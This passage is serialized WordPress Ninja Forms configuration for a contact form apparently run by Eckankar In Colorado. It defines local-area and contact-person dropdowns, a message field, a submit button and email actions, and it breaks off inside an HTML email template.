Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_146\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_146\";}s:2:\"id\";i:664;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"ESA-Initiator-Barry Frost\";s:4:\"calc\";s:1:\"-\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";s:12:\"manual_value\";b:1;}i:3;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA-Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";s:12:\"manual_value\";b:1;}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:43:\"Select The Person You Would Like To Contact\";s:9:\"field_key\";s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";}s:2:\"id\";i:665;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_150\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_150\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:666;}i:8;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797373767\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:5:\"label\";s:4:\"HTML\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1663797373767\";}s:2:\"id\";i:668;}i:9;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"10\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_152\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_152\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:667;}i:10;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:11:\"idAttribute\";s:2:\"id\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797370980\";s:15:\"container_class\";s:0:\"\";s:7:\"default\";s:0:\"\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1663797370980\";}s:2:\"id\";i:669;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-07-04 09:22:26\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:254;}i:1;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-07-04 09:22:26\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_144}\";s:13:\"email_subject\";s:26:\"Loveland Initiator and ESA\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:13:\"email_message\";s:7304:\"      <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms- User Confirmation</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table 